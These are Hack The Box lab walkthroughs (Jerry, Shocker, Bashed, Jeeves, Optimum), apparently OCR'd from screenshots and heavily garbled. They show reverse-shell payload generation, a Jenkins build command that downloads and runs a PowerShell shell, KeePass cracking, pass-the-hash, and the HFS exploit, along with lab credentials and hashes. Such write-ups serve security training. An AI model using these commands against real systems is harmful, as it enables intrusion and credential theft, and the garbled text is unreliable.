Tag: htb

Jerry – No Metasploit

Yeah… that’s definitely not the Jerry I remember from Tom and Jerry. Anyway, let’s get started with our usual portscan:

PORT STATE 8Ø8Ø/tcp open l_http-favicon: I http-methods: SERVICE http Apache REASON VERSION I _ Supported Methods: syn-ack tt1 127 Apache Tomcat/Coyote JSP engine 1.1 Tomcat GET HEAD POST OPTIONS l_http-server-header: Apache-coyote/ 1.1 l_http-title: Apache Tomcat/7.ø.88 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2012 (90%) OS CPE: cpe: /o:microsoft OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2012 (90%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (90%), No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: OPS(OI

Okay. Let’s look at some other enumeration scans, namely gobuster on port 8080 and nikto:

kaliöhyd3 . "Tools/AutoRecon/resuIts/1ø.1ø.1ø.95/scans$ cat tcp_8Ø8Ø_http_gobuster.txt (aux (Status: (coml (Status: /com4 (Status: /com2 (Status: /com3 (Status: Icon (Status: (docs (Status: 200) [Size: 0] 200) [Size: 0] 200) [Size: 0] 200) [Size: 0] 200) [Size: 0] 200) [Size: 0] 302) [Size: 0] (examples (Status: 302) [Size: 0] /favicon .ico (Status: 200) [Size: 21630] (host-manager (Status: 302) [Size: 0] / index.jsp (Status: 200) [Size: 11398] (manager (Status: 302) [Size: 0] /nul (Status: 200) [Size: 0]
kalijhyd3 . —/TooIs/AutoRecon/resuIts/1ø.1ø.1ø.95/scans$ cat tcp_8Ø8Ø_http_nikto.txt - Nikto v2.1.6 Target IP: Target Hostname: Target Port: Start Time: 10.10.10.95 10. 10.10.95 8080 2020-05-28 14:11:59 (GMT-4) Server: Apache-coyote/ 1.1 The anti-clickjacking X-Frame-Options header is not present. The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type No CGI Directories found (use '-C all' to force check all possible dirs) OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS OSVDB-397: HTTP method ( 'Allow' Header): 'PUT' method could allow clients to save files on the web server. OSVDB-5646: HTTP method ( 'Allow' Header): 'DELETE' may allow clients to remove files on the web server.

Hmm. Ok interesting… So we can use PUT and place a malicious file on the server…? But let’s see if there’s another way to get into this box:

Ooh Apache Tomcat! Pretty familiar with this. Using default creds: tomcat and s3cret, we get in.

Scrolling down, we see we can upload a .war file.

Deploy Deploy directory or WAR file located on server Context Path (required): XML Configuration file URL: WAR or Directory URL: Deploy WAR file to deploy Select WAR file to upload Browse... Deploy No file selected.

Too easy. We can generate a war file with msfvenom to get a reverse shell:

kalijhyd3. •-/Documents/htb/jerry$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=1ø.1ø.14.3ø LPORT=4444 -f war > hyd3 .war Payload size: 1089 bytes 'Final size of war file: 1089 bytes

Clicking the link navigates us to our war file which triggers the reverse shell

kaliö)hyd3 . "Documents/htb/jerry$ rlwrap nc -nvlp listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.95] 49192 Microsoft Windows [Version 6.3.96øø] (c) 2013 Microsoft Corporation. All rights reserved . whoami nt authority\system hostname JERRY

NT AUTHORITY\SYSTEM shell! A bit anti-climactic but oh well. Getting the flags, we see that this was the intended way because we have “2 for the price of 1.txt” for the flags:

Shocker – No Metasploit

Cool… let’s get started with a portscan and basic gobuster enumeration:

Okay. Let’s have a look at the website:

Hm. Seemingly useless dead end.

I thought I was missing something. No matter how much I try to enumerate, I come up short with nothing:

Then after doing A LOT of research, I found out that cgi-bin stores scripts in other languages such as python, js, bash, php, etc.

Let me try fuzzing that with those specific extensions:

Finally a hit. user.sh

Googling for cgi-bin and sh web exploits, shellshock came up… I looked into it more and knew I had to put a special shellshock string into the User-Agent field to exploit the vulnerability, followed by the command

And we get a callback on our listener:

Note: Usually I’ll have tested the above exploit with a ping first, but at this point I was extremely frustrated and just wanted to go for it.

Grabbing the user flag:

Okay. Now on to priv esc. I always like to do sudo -l as one of the first enumeration commands:

duh. So I can run any perl command as root. This should be pretty obvious but from here, all you need to do is sudo /usr/bin/perl and then either use pentestmonkey’s perl reverse shell one-liner and you’ll get a root shell OR just use perl syntax to switch to the root user. Leaving this open-ended for you to figure out the rest!

Bashed – No Metasploit

Let’s start off with our portscan:

Looks like only port 80 is open. Running gobuster on port 80, we get some interesting directories:

After going down the list, we see /dev’s contents:

What’s phpbash.php ?

It’s an interactive web shell. Well that’s pretty straight forward. Using this payload from the pentestmonkey website:

We get a reverse shell on our listener:

Grabbing the user.txt flag:

So let’s look around and MANUALLY enumerate before we try to use scripts. Manual enumeration is always preferred because you’re being more intentional on what you’re looking at. And to be honest, scripts can always miss stuff.

Running PS -ef we see that there is a cron job running every minute:

So let’s try to read test.py

Womp womp. Okay… well let’s try to do something that we should have done right away in the first place: sudo -l

So this is interesting. We know that scriptmanager is a user on the box. This took me a little bit, but I eventually got it (of course, syntax error):

So now, I can read test.py. Now that I am scriptmanager, I’m willing to bet that test.py is executed by root. I just need to create my own test.py and replace what’s in there.

Once I put this on the box, I tested it first to make sure it worked … of course I had a few issues prior to getting the script right but that’s why we test first!

Ok so the script works. Time to let the cron run and start our listener and wait patiently for root to execute the script:

Jeeves – No Metasploit

Fire up autorecon and run some scans… I did this while I went to http://10.10.10.63. It’s a good habit to just try port 80 while your scans are running so you’re not wasting time.

So when we go to the website and try searching, anything we do results in this:

Server Error in '/' Application. Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 May 26 2009 14:24:20 Copyright (c) 1988-2005 Microsoft Corporation standard Edition on Windows NT 5.0 (Build 2195: service Pack 4) ' to data type int. - 9.00.4053.00 (Intel X86) Description: An ocwrred during the of the web rewest. review the suck trace for information the error and o@inated wd e. Exception Details: System DataSqICIient-SØException: Cmversion füd when the nvarchar value 'Microsoft SQL Server 2Ø5 - 9.00-4053.00 X86) May 26 2009 Copyr•t (c) 19"-2005 Microwtt Corporation Edition on Windows NT 5.0 (Build 2195: Service 4) • to data type int. Error:

But weird thing is… it’s a fake image. So this is a dead end.

I waited a bit and got my scans back. Let’s look at nmap:

Nmap scan report for 10.10.10.63 Host is up, received user-set (ø.ø44s latency). scanned at 2020-05-27 16:17:20 EDT for 192s Not shown: 65531 filtered ports Reason: 65531 no-responses PORT 8Ø/tcp STATE SERVICE open http REASON VERSION syn-ack tt1 127 Microsoft IIS httpd 10.0 I http-methods: I supported Methods: OPTIONS TRACE GET HEAD POST Potentially risky methods: TRACE l_http-server-header: Microsoft-IIS/1ø.ø I _http-title: Ask Jeeves 135/tcp open msrpc syn-ack tt1 127 Microsoft Windows RPC 10 microsoft-ds (workgroup: WORKGROUP) 445/tcp open microsoft-ds syn-ack ttI 127 Microsoft Windows 7 - 5ØØØØ/tcp open http syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT l_http-server-header: Jetty(9.4.z-SNAPSHOT) I _http-title: Error Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2008 (88%) OS CPE: cpe: /o:microsoft : r2 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: OPS(OI

Okay so there’s a port 50000 as well. I like to switch up the enumeration tools so this time I wanted to try using wfuzz. Running wfuzz on port 80 didn’t show anything new. However, on port 50000:

kalijhyd3 . —/TooIs/AutoRecon/resuIts/1Ø.1Ø.1Ø.63/scans$ wfuzz -c -w /usr/share/wordlists/dirbus ter/directory-1ist-2.3-medium.txt - -hc http://1Ø.1Ø.1Ø.63:5ØØØØ/FUZZ Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing S SL sites. Check Wfuzz's documentation for more information. * Wfuzz 2.4.5 - The Web Fuzzer Target: http://1Ø.1Ø.1Ø.63:5ØØØØ/FUZZ Total requests: 220560 ID øøøø41607 : 000048313 : Finishing Response 302 pending Lines 11 L Word 26 w Chars Ch 318 Ch Payload " askj eeves " "bt3" requests...

Alright… Let’s navigate to http://10.10.10.63:50000/askjeeves/

Jenkins Jenkins New Item People Build History Manage Jenkins Credentials Build Queue No builds in the queue. Build Executor Status 1 Idle 2 Idle log in AUTO REFRESH gadd description All s 0 Icon: w Name da nci n2020 Last Success 7 hr56 min - #10 7 hr28 min - #1 Last Failure 7 hr25 min - #16 WA RSS for all Last Duration 2.3 sec 2.6 sec RSS for failures RSS for iust latest builds

Interesting. I tried logging in with default creds and common lists, but nothing worked. I then just started poking around at the site to see what I could do without logging in.

Looks like we can create a project.

e Jenkins Jenkins Enter an item name pngmel Required field Freestyle project This is the central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can be even used for something other than software build. Pipeline Orchestrates long-running activities that can span multiple build slaves. Suitable for building pipelines (formerly known as workflows) and/or organizing complex activities that do not easily fit in free-style job type. Multi-configuration project Suitable for projects that need a large number of different configurations, such as testing on multiple environments, platform-specific builds, etc. Folder Creates a container that stores nested items in it Useful for grouping things together. Unlike view, which is just a filter, a folder creates a separate namespace, so you can have multiple things of the same name as long as they are in different folders. GitHub Organization Scans a GitHub organization (or user account) for all repositories matching some defined markers. Multibranch Pipeline Creates a set of Pipeline projects according to detected branches in one SCM repository. create a new item from other existing, you can use this option: Type to autocomplete log in

Now clicking around and scrolling down… we see something very interesting:

Jenkins pi ngme General Source Code Management Build Triggers Build Environment Build Post-build Actions Build periodically GitHub hook trigger for GITScm polling Poll SCM Build Environment Delete workspace before build starts Abort the build if it's stuck Add timestamps to the Console Output Use secret text(s) or file(s) With Ant Build Add build step Execute Windows batch command Execute shell Invoke Ant Invoke Gradle script Invoke top-level Maven targets Run with timeout Set build status to -pending" on GitHub commit Page generated: May 28, 2020 224-53 PM EDT REST API Jenkins ver. 2.87

This looks like a clear path to RCE. Let’s test it out:

Build Execute Windows batch command Command ping 1€.1€.14.3€ See the list of available environment variables Add build step Post-build Actions Add post-build action Apply Advancedm

After saving it, I had to figure out how to trigger it. The “build now” button seemed like a good candidate:

Build Now Delete Project Configure Build History find May 28, 2020 226 PM trend —

Running tcpdump on my box, I see the ICMP requests coming through:

kaliö)hyd3 . "Tools/AutoRecon/resuIts/1Ø.1Ø.1Ø.63/scans$ sudo tcpdump -i tunø tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on tunø, link-type RAW (Raw IP), capture size 262144 bytes IP hyd3.5Ø661+ > 10.10.1ø.63.5øøøø: Flags seq 984844400:984845062, ack 30 63434529, win 501, options [nop, nop,TS val 1480055907 ecr 40178073], length 662 •24.973560 IP 10.10.10.63.5øøøø > hyd3.5Ø664: Flags seq 1:206, ack 662, win 254, op 09:22. tions [nop, nop,TS val 40181743 ecr 1480055907], length 205 •24.973596 IP hyd3.5Ø661+ > 10.10.1ø.63.5øøøø: Flags [ . ] , ack 206, win 501, options [nop,n 09:22. val 1480055951 ecr 40181743], length op , TS •25 . 043798 IP 10.10.1Ø.63 > hyd3: ICMP echo request, id 1, seq 5, length 09:22. •25.043814 IP hyd3 > 10.1Ø.1Ø.63: ICMP echo reply, id 1, seq 5, length 09:22. •26.061409 IP 10.10.10.63 > hyd3: ICMP echo request, id 1, seq 6, length 09:22. •26. 061442 IP hyd3 > 10.10.10.63: ICMP echo reply, id 1, seq 6, length 09:22. •26.312795 IP hyd3.5Ø661+ > 10.10.10.63.5øøøø: Flags [P.], seq 662:1331, ack 206, win 501, 09:22. options [nop, nop,TS val 1480057290 ecr 40181743], length 669 IP 10.10.1ø.63.5øøøø > hyd3.5Ø664: Flags [P.], seq 206:1161, ack 1331, win 252 , options [nop, nop,TS val 40183134 ecr 1480057290], length 955 IP hyd3.5Ø661+ > 10.10.1Ø.63.5ØØØØ: Flags nop,TS val 1480057342 ecr 40183134], length IP 10.10.10.63 > hyd3: IP hyd3 > 10.10.10.63: IP 10.10.10.63 > hyd3: IP hyd3 > 10.10.10.63: ICMP ICMP ICMP ICMP echo echo echo echo request, id reply, id 1, request, id reply, id 1, ack 1161, win 501, options [nop, 1, seq 7, length seq 7, length 1, seq 8, length seq 8, length

Now it’s as simple as creating a reverse powershell script with Nishang and appending the bottom with a callback to our box:

catch Write-warning "Something went wrong! Check if the server is reachable and you are usin g the correct port." Write-Error $_ 128, 63 Invoke-PowerSheIITcp -Reverse -IPAddress 10.10.14.30 -Port Bot

Serve up the PowerShell script:

kaliöhyd3 . "Documents/htb/jeeves$ python -m Serving HTTP on ø.ø.ø.ø port 8000 (http://ø. - [28/May/2Ø2Ø 09 : 36: 12] "GET 10.10.10.63 - http.server ø.ø.ø:8øøø/) . / Invoke-PowerShe11Tcp.ps1 HTTP/I.I" 200 -

Modify the build request:

Build Execute Windows batch command Command IEX(New-Object Net .WebClient) .downloadString( 'http://l€ . 16 . 14.36 : 8€0€/Invoke- PowerShellTcp . PSI See the list of available environment variables Add build s tep

Once you trigger it, you should receive a callback on your listener:

kaliö)hyd3 . —/Documents/htb/jeeves$ rlwrap nc -nvlp listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.63] 49688 Windows PowerSheII running as user kohsuke on JEEVES Copyright (C) 2015 Microsoft Corporation. All rights reserved . PS C: j eeves\kohsuke PS C: hostname Jeeves

As a force of habit, I uploaded nc.exe and used it to get a binary shell as well

Some simple enumeration showed an interesting file: CEH.kdbx

Directory 05/28/2020 05/28/2020 09/18/2017 of C: 02:42 PM 02:42 PM 01:43 PM 2,846 CEH.kdbx

I tried copying the file with nc.exe but it was way too slow (if at all). I ended up using SMB:

kaliö)hyd3: "Documents/htb/jeeves/smb$ sudo python3 /usr/share/doc/python3-impacket/exampIes/sm bserver. py hyd3 /home/kaIi/Documents/htb/jeeves/smb Impacket vø.9.21 - Copyright 2020 SecureAuth Corporation Config file parsed Callback added for UUID 4B324FC8-167ø-01D3-1278-5A47BF6EE188 V:3.Ø Callback added for UUID 6BFFDø98-A112-361ø-9833-46C3F87E345A v:l.ø Config file parsed Config file parsed Config file parsed

Create the folder on the victim box and navigate to it:

Ips C. • New-PSDrive -Name 0.14. Name hyd3 "hyd3" -PSProvider "FileSystem" -Root 3Ø\hyd3" Used (GB) CurrentLocation Free (GB) Provider FileSystem Root

Copy the file over

Now looking at the file and running file on it, you know it’s a keypass file. Crack it with hashcat. In order to do this first you need to extract the hash with keepass2john:

kaliöhyd3 . —/Documents/htb/jeeves/smb$ /usr/sbin/keepass2john CEH.kdbx > ceh .hash kaliöhyd3 . —"Documents/htb/ jeeves/smb$ cat ceh . hash CEH : 3766b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fcff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b 68254db431a21ec33298b612fe647db48 kaliö)hyd3 . •-/Documents/htb/jeeves/smb$ vi ceh .hash

Locate the mode (-m) for hashcat for this hash format:

Hashcat is not expecting the CEH: file name before the hash, so edit that and then run hashcat with rockyou.txt

kaliöhyd3 . —/Documents/htb/jeeves/smb$ vi ceh .hash kaliöhyd3 . •-/Documents/htb/jeeves/smb$ cat ceh .hash b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØfr66ØfCffr4f1CC89f728b6825 4db431a21ec33298b612fe647db48
kaliöhyd3 . "Documents/htb/jeeves/smb$ hashcat txt ceh .hash hashcat (v5.1.ø) starting... OpenCL Platform #1: The pocu project -m 13400 -w 1 /usr/share/wordlists/rockyou . * Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable, Counted lines in /usr/share/wordlists/rockyou . txt... Insufficient memory available Insufficient memory available Segmentation fault 4MCU

Whoops… This happened because I swapped the wordlist and the actual hash… so hashcat thought it was cracking a much larger file.

kalijhyd3 : "Documents/htb/jeeves/smb$ hashcat you . txt hashcat (v5.1.ø) starting... OpenCL Platform #1: The pocu project -m 13400 -a ceh .hash /usr/share/wordlists/rock * Device #1: pthread-AMD Ryzen 7 2700 Eight-Core Processor, 1024/2272 MB allocatable, Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, øxøøøøffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable optimizers: * Zero-Byte * Single-Hash * Single-Salt Minimum password length supported by kernel: Maximum password length supported by kernel: 256 Watchdog: Hardware monitoring interface not found on your system. Watchdog: Temperature abort trigger disabled . * Device #1: build_opts ' -cm-std=CL1.2 -I OpenCL -I -D VENDOR ID-64 -D CUDA ARCH=ø -D AMD ROCM=ø -D -D DGST RI-I -D DGST R2=2 -D DGST R3=3 -D DGST ELEM=I+ -D KERN TYPE=134øø -D unroll ' * Device #1: Kernel m134øø-pure.ce8862df .kernel not 4MCU /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYP VECT SIZE-8 -D DEVICE TYPE-2 -D DGST RO=ø found in cache! Building may take a while.
b61e656351C3acaØ282f1617511Ø31fØ156Ø89b6C5647de4671972fCff*Cb4Ø9dbCØft66ØfCfft4f1CC89f728b6825 4db431a21ec33298b612fe647db48 : moonshinel Sesslon..... hashcat Status.... Cracked Hash . Type. KeePass 1 (AES/Twofish) and KeePass 2 (AES) Hash . Target.... Time Started Thu May 28 2020 (31 secs) Time. Estimated... : Thu May 28 2020 (0 secs) File (/usr/share/wordlists/rockyou . txt) Guess .Base.......: 1/1 (løø.øø%) Guess .Queue...... Speed Recovered........ Progress.......... Rejected... Restore.point....: Restore. Sub .#1...: Candidates .#1.... Started: Thu May Stopped: Thu May . .47db48 1760 H/s (12.21ms) Accel:512 Loops:64 Thr:l vec:8 1/1 (løø.øø%) Digests, 1/1 (løø.øø%) Salts 55296/14344385 (0.39%) 0/55296 (ø.øø%) 53248/14344385 (0.37%) Salt:Ø Amplifier: 0-1 Iteration: 5952-6000 soydivina 28 28 grad2ø1ø 2020 2020

So we found that the password for the file is moonshine1

Looking through everything in the kdbx file, we find:

CEH.kdbx [read-only] Groups View Tools Help - KeePassX Database Entries CEH General Windows Network Internet a eMai1 Homebanking Backup stuff Bankof America p DC Recovery PW P EC-Counci1 It's a secret Jenkins admin Keys to the king... Walmart.com Username Michae1321 administrator hackerman123 admin admin bob anonymous URL https://www.bankofamerica.com https://www.eccouncil.org/progra... http://localhost:8180/secret.jsp http://localhost:8080 http://www.walmart.com

Taking note of all our credentials found

backups tuff : aad3b435b51404eeaad3b435b51404ee : eØfb1 fb85756c24235ff238cbe81 feøø Michae1321: 12345 administrator : SITjAtJHKsugh90C4VZ1 hackerman123 : pwndyouall ! admin : F7WhTrSFDKB6sxHU1 cun b0b: ICEUnYPjNf1uPZSzOySA anonymous : password

So I tried using smbexec with either of the administrator passwords with no luck… but I knew that first line is a hash, so I attempted to pass the hash… and returned a system shell

kaliö)hyd3 . •-/Documents/htb/ jeeves/smb$ pth-winexe -U administrator%aad3b435b51W4eeaad3b435b514 04ee: eøfb1fb85756c24235ff238cbe81feøø // 10.10.10.63 cmd . exe E_md4hash wrapper called. HASH PASS: Substituting user supplied NTLM HASH. Microsoft Windows [Version 10.0.10586] (c) 2015 Microsoft Corporation. All rights reserved . C: \Windows whoami jeeves\administrator C: \Windows hostname Jeeves

Grabbing the user and root flags:

C: Administrator cd Administrator C: Desktop cd Desktop C: \Users dir Volume in drive C has no label. Volume Serial Number is BE5ø-BIC9 Directory 11/08/2017 11/08/2017 12/24/2017 11/08/2017 of C: 10:05 AM 10:05 AM 03:51 AM 10:05 AM 2 File(s) 2 Dir(s) 36 hm. txt 797 Windows 10 Update Assistant.lnk 833 bytes 7 bytes free C: \Users cd 'cd' is not recognized as an internal or external comand, operable program or batch file. C: hm. txt type hm.txt The flag is elsewhere. Look deeper.

What? Deeper?

Ok, maybe an alternate data stream… I found an online tutorial using streams.exe but it didn’t want to work for me, so I found a PowerShell alternative:

Optimum – No Metasploit

Lets power up nmap and see what we find:

PORT STATE SERVICE REASON VERSION 8Ø/tcp open http syn-ack ttI 127 HttpFiIeServer httpd 2.3 l_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1 I http-methods: I _ Supported Methods: GET HEAD POST _http-server-header: HFS 2.3 l_http-title: HFS / Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 20121712008120161vista (91%) OS CPE: cpe:/o:microsoft:windows_server_2ø12 cpe:/o:microsoft:windows_7: cpe:/o:microsoft:windows_server_2øø8:r2 cpe:/o:microsoft:windows_8 cpe:/o:micr t:windows vista: :- cpe: :spl OS fingerprint not ideal because: Missing a closed TCP port so results incomplete Aggressive OS guesses: Microsoft Windows Server 2012 (91%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 (91%), Mic osoft Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 SPI or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 Professional or or Windows Server 2008 SP2 or 2008 R2 SPI (85%), Microsoft Windows Vista SPO or SPI, Windows Server 2008 SPI, or Windows 7 (85%) No exact OS matches for host (test conditions non-ideal). TCP/IP fingerprint: 686-pc-linux-gnu) OPS(OI

Okay. Let’s go to 10.10.10.8

@ 10.10.10.8 Most Visited Offensive Security Kali Tools •S Exploit-DB OS user Login No files in this folder D Folder O folders, O files, O bytes -72090 Student co... Offensive Security For... Q Search Inbox - adeebhshah@g... Finding Bad Character... Search Select go Invert Mask O items selected Actions Archive Get list Server information HttpFileServer2.3 sep.'er time: 3/6/2020 Server uptime: 10:37:37

Look at the bottom left. We get HttpFileServer 2.3

Let’s poke around on SearchSploit:

searchsploit hfs Exploit Title TRUNCATE Denial of Ser Apple Mac OSX 10.4.8 - NIG kFS+ DO _ LRFS FileSystem (Denial of Service) Apple Mac OSX 10.6 - Subsystem Information Disclosure Apple Mac OSX 10.6.x - BFS Apple Mac OSX xnu 1228. x - 'hCs-fcntI' Kernel Privilege Escal FHES - FTP/HTTP File Server 2.1.2 Remote Command Execution Linux Kernel Double-Free Denial of Service 2 6 x SquashF Rejetto Rejetto Rejetto Rejetto Rejetto Rejetto HTTP HTTP HTTP HTTP HTTP HTTP File File File File File File Server Server Server Server Server Server (kFS) Remote Command Execution (Me 1.5/2. x - Multiple Vulnerabili 2.2/2.3 - Arbitrary File Uploa 2.3.x - Remote Command Executi 2.3.x - Remote Command Executi 2.3a/2.3b/2.3c - Remote Comman Path (/usr/share/exploi tdb/) exploi ts/osx/dos/29454. txt exploits/osx/dos/12375. c exploi ts/osx/IocaI/35488. c exploits/osx/IocaI/8266. txt exploi ts (windows / remote/ 37985 . py exploits/Iinux/dos/28895. txt expl oi ts/windows / remote/ 34926. rb exploi ts/windows/remote/31Ø56. py exploits/mu1tip1e/remote/3Ø850. txt exploi ts (windows / remote/ 34668. txt exploi ts/windows/remote/39161. py expl oi ts/windows /webapps/34852. txt

RCE always looks fun. Let’s look at that one… specifically the .txt file:

issue exists due to a poor regex in the file ParserLib.pas function findMacroMarker(s:string; begin result: , ofs) end; it will not handle null byte so a request to http://localhost : . exec I cmd . } will stop regex from parse macro , and macro will be executed and remote code injection happen . EDB Note: This vulnerability will run the payload multiple times simultaneously. Make sure to take this into consideration when crafting your payload (and/or listener).

So basically we need to apply a null byte and then {.exec|cmd.} where cmd is whatever command we want. Let’s use burp to try this out. It took me a while to figure this out and I actually had to watch Ippsec’s video but in it he explains the importance of SysNative vs. SysWow64 vs System32.

And in our icmp dump we get:

20:58:30. 657617 657649 703055 703087 706503 706526 707674 20:58:30. 707698 . 674435 . 674469 •58:31.721354 721401 20:58:31. 721416 20:58:31. 721419 20:58:31. 721496 20:58:31. 721501 690808 20:58:32. 690842 20:58:32. 736639 20:58:32. 736673 20:58:32. 736686 20:58:32. 736688 20:58:32. 736694 20:58:32. 736696 20:58:33. 706481 20:58:33. 706515 752505 20:58:33. 752539 20:58:33. 752550 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 > hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 > hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10.10.8 hyd3: hyd3 > 10.10.10.8: 10.10. 10.8 hyd3: ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP ICMP echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo echo request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id reply, id 1, request, id 1, seq 37, length seq 37, length 1, seq 38, length seq 38, length 1, seq 39, length seq 39, length 1, seq length seq length 1, seq 41, length seq 41, length 1, seq 42, length seq 42, length 1, seq 43, length seq 43, length 1, seq length seq length 1, seq 45, length seq 45, length 1, seq 46, length seq 46, length 1, seq 47, length seq 47, length 1, seq 48, length seq 48, length 1, seq 49, length seq 49, length 1, seq 50, length seq 50, length 1, seq 51, length

So we have command execution! Now, let’s copy Invoke-PowerShellTCP.ps1 to working our directory and append the file with the example in the PS1 script

$client .C10se() if ($listener) $1istener .stop( ) catch Write-warning rrect port." Write-Error $_ "Something went wrong! Check if the server is reachable and you are using the co Invoke-PowerShe11Tcp -Reverse -IPAddress 10.10.14.30 -Port

Serve it up on our box:

- [27/May/2Ø2Ø 110.10.10.8 .8 - - [27/May/2Ø2Ø 10.10. 10 "10.10.10 .8 - - [27/May/2Ø2Ø .8 - - [27/May/2Ø2Ø 10.10.10 8 - - [27/May/2Ø2Ø "10.10.10. .8 - - [27/May/202ø kaliö)hyd3 . "Documents/htb/optimum$ sudo python -m http.server 80 Serving HTTP on ø.ø.ø.ø port 80 (http• .//ø.ø.ø.ø:80/) . HTTP/I.I" 200 HTTP/I.I" 200 HTTP/I.I" 200 HTTP/I.I" 200 HTTP/I.I" 200 HTTP/I.I" 200 17:22:31] 17:22:31] 17:22:31] 17:22:32] 20:53:51] 20:53:51] "GET "GET "GET "GET "GET "GET / Invoke-PowerShe11Tcp. PSI / Invoke-PowerShe11Tcp. PSI / Invoke-PowerSheIITcp. PSI / Invoke-PowerShe11Tcp. PSI / Invoke-PowerShe11Tcp. PSI / Invoke-PowerSheIITcp. PSI

Now let’s supply the correct argument to burp and remember to URL encode it. Don’t forget to set up your listener.

On our listener, we get a user shell:

Ikaliö)hyd3 . "Documents/htb/optimum$ rlwrap nc -nvlp listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49282 Windows PowerSheII running as user kostas on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved . PS C:

Looking around we get some creds that are pretty much useless at this point (but we keep enumerating anyway!)

DefaultDomainName DefaultUserName DefaultPassword Alt DefaultDomainName AltDefau1tUserName AI tDefau1 tPassword kostas kdeEjDowkS*

At this point, I ran sherlock.ps1 to help me out a bit.

kaliö)hyd3 . —/Documents/htb/optimum$ rlwrap nc -nvlp listening on [any] connect to [10.10.14.30] from (UNKNOWN) [10.10.10.8] 49295 Windows PowerShe11 running as user kostas on OPTIMUM Copyright (C) 2015 Microsoft Corporation. All rights reserved . PS http://1ø.1ø.14.3ø/winPEAS_64.exe -outfile winpeas64.exe PS C: IEX(New-Object Net 'http://1ø.1ø.14.3ø/Sher10ck.ps1') Title MSBu11etin CVEID ,Link VulnStatus Title MSBu11etin CVEID Link VulnStatus Title MSBu11etin CVEID Link VulnStatus Title MSBu11etin CVEID 'Link VulnStatus Title MSBu11etin •Link VulnStatus Title MSBu11etin CVEID Link VulnStatus User Mode to Ring (KiTrapøD) MS1ø-ø15 2010-0232 . https://www.exploit-db.com/exp10its/11199/ Not supported on 64-bit systems Task Scheduler . XML MS1ø-ø92 . 2010-3338, 2010-3888 . https://www.exploit-db.com/exp10its/1993ø/ Not Vulnerable NTUserMessageCaII Win32k Kernel Pool Overflow MS13-ø53 . 2013-1300 . https://www.exp10it-db.com/exp10its/33213/ Not supported on 64-bit systems TrackPopupMenuEx Win32k NULL Page MS13-ø81 . 2013-3881 . https://www.exp10it-db.com/exp10its/31576/ Not supported on 64-bit systems TrackPopupMenu Win32k Null Pointer Dereference MS14-ø58 . 2014-4113 . https://www.exploit-db.com/exp10its/351ø1/ Not Vulnerable ClientCopyImage Win32k MS15-ø51 . 2015-1701, 2015-2433 . https://www.exp10it-db.com/exp10its/37367/ Not Vulnerable

Hmm. At first I tried using an off-the-shelf MS16-032.ps1 script but they don’t work because they spawn a new terminal. We don’t have visual access so we can’t use it. Ippsec’s video shows us that there’s a copy in Empire that can be used on the CLI.

Testing it out:

